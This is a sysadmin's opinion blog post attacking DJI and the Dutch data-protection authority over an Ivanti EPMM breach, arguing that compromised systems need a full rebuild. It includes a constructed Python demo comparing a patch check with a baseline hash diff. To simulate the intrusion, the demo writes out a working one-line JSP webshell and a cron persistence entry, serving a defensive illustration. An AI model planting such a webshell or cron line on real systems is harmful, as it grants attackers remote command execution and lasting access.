
The DJI and AP Collapse: A Masterclass in Institutional Hypocrisy

Ronny Roethof
A security-minded sysadmin who fights corporate BS with open source weapons and sarcasm
Summary

The DJI (Dienst Justitiële Inrichtingen), the Dutch prison and custodial agency responsible for inmate management and staff safety, suffered a major cybersecurity failure that exposes the fragility of Dutch government IT. Attackers held Remote Code Execution (RCE) access for five months, and the safety of 16,000 justice officials was traded away for operational neglect. This breach goes beyond a simple data leak: the attackers exploited Ivanti EPMM, the mobile device management platform that governs staff phones, to execute arbitrary code, effectively taking control of devices rather than merely reading data from them. Patches alone are insufficient: a patch closes the entry point but does nothing about the persistence, credentials and tooling an attacker with five months of code execution has already planted, so the systems must be considered compromised and a full rebuild from known-good media is the only safe path.
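Why "we installed the patch" is not the same as "the attacker is gone" is easy to show on a constructed filesystem. The example below is added here and is not the post's own material, nor anything from DJI or Ivanti: the file names, the fake server binary, the dropped webshell and the cron entry are all invented stand-ins. It builds a known-good (already patched) reference install, lets a simulated attacker plant two persistence artifacts on the live host, applies the vendor patch, and then shows that a naive patch-level check reports success while a hash comparison against the known-good baseline still flags the planted files.

```python
"""Patch status vs. integrity against a known-good baseline (constructed demo)."""
import hashlib
import tempfile
from pathlib import Path

# Hypothetical contents; none of these names or bytes come from a real product.
VULNERABLE_BIN = b"server v1.0 (vulnerable)"
PATCHED_BIN = b"server v1.1 (patched)"
CLEAN_CRON = "0 3 * * * root /usr/sbin/logrotate\n"


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def snapshot(root: Path) -> dict[str, str]:
    """Map of relative POSIX path -> sha256 for every regular file under root."""
    return {
        p.relative_to(root).as_posix(): sha256_of(p)
        for p in root.rglob("*")
        if p.is_file()
    }


def diff_against_baseline(baseline: dict[str, str], current: dict[str, str]):
    """Return (added, modified, removed) relative paths, each sorted."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(
        p for p in baseline if p in current and baseline[p] != current[p]
    )
    return added, modified, removed


def build_install(root: Path) -> None:
    """Lay out a minimal, vulnerable install (constructed layout)."""
    (root / "app").mkdir(parents=True)
    (root / "app" / "server.bin").write_bytes(VULNERABLE_BIN)
    (root / "etc" / "cron.d").mkdir(parents=True)
    (root / "etc" / "cron.d" / "logrotate").write_text(CLEAN_CRON)


def apply_vendor_patch(root: Path) -> None:
    """The patch replaces the vulnerable component and nothing else."""
    (root / "app" / "server.bin").write_bytes(PATCHED_BIN)


def simulate_intrusion(root: Path) -> None:
    """An attacker with RCE drops a webshell and a cron persistence line."""
    (root / "app" / "static").mkdir(exist_ok=True)
    (root / "app" / "static" / "cache.jsp").write_text(
        '<% Runtime.getRuntime().exec(request.getParameter("c")); %>'
    )
    (root / "etc" / "cron.d" / "logrotate").write_text(
        CLEAN_CRON + "*/5 * * * * root /tmp/.x\n"
    )


def is_patched(root: Path) -> bool:
    """The only check many orgs perform: is the vulnerable component updated?"""
    return (root / "app" / "server.bin").read_bytes() == PATCHED_BIN


def demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        reference = Path(tmp) / "reference"   # known-good, built from media
        host = Path(tmp) / "host"             # the exposed production box
        build_install(reference)
        apply_vendor_patch(reference)         # baseline is the patched version
        baseline = snapshot(reference)

        build_install(host)
        simulate_intrusion(host)              # five months of attacker access
        apply_vendor_patch(host)              # "we patched it" after the fact

        added, modified, removed = diff_against_baseline(baseline, snapshot(host))
        return {
            "patched": is_patched(host),
            "added": added,
            "modified": modified,
            "removed": removed,
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The patch check passes, yet the baseline diff lists a file that should not exist and a system file whose hash no longer matches. On a real host the attacker's artifacts are not this obvious and the baseline is not this small, which is exactly why the post's conclusion holds: once arbitrary code execution has been confirmed, rebuilding from known-good media is cheaper and more reliable than trying to enumerate everything a diff like this might miss.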

The Hypocrisy of the Watchdog

The irony deepens when we consider that the Autoriteit Persoonsgegevens (AP) fell victim to the exact same Ivanti flaw. How can the AP credibly fine private companies for “insufficient security” when it fails to protect its own infrastructure from a known vulnerability? This isn’t merely an IT failure; it is a failure of institutional accountability.

Institutional Neglect and the Culture of ‘MicroSLOP’

The human consequences are immediate: prison directors and staff are now exposed to blackmail. DJI's advice to staff to "turn off location data" does nothing about the five months of location history an attacker with control of the management platform could already have collected. Beyond this, the organization's culture, dubbed "MicroSLOP" by industry peers, prioritizes low-quality, high-maintenance enterprise software over resilient, secure architecture, leaving systemic vulnerabilities unaddressed.

Professional Reality

This pattern is familiar across Dutch institutions, including RIVM. Leadership often remains in “Plato’s Cave,” fixated on compliance metrics while real servers burn. Warnings are ignored, promises are broken, and surprise follows predictably when supposedly secure systems are compromised.

Final Verdict

If you cannot secure the people who secure prisoners, you have lost control. DJI's top management and AP leadership must be held accountable. No more "zorgelijke situatie" ("worrying situation") press releases: resignations are warranted. In cases of deep compromise, patching is not enough; the only solution is to burn it down and start over. Yet in Den Haag, the likely response will be to invest in more "MicroSLOP."
